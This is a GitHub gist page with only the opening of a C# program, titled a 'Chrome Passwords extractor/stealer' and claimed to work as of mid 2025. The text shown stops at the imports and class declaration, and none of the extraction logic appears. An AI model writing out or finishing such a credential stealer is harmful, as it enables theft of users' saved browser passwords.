Skip to content

Instantly share code, notes, and snippets.

View theflorr's full-sized avatar

TheFlorr theflorr

  • Denmark
  • 05:44 (UTC -12:00)
View GitHub Profile
@theflorr
theflorr / Program.cs
Created May 26, 2025 06:53
Chrome Passwords extractor/stealer v20 - Working as of mid 2025
using System;
using System.IO;
using System.Text;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Data.SQLite;
using System.Collections.Generic;
using System.Text.Json;
class ChromePasswordRecovery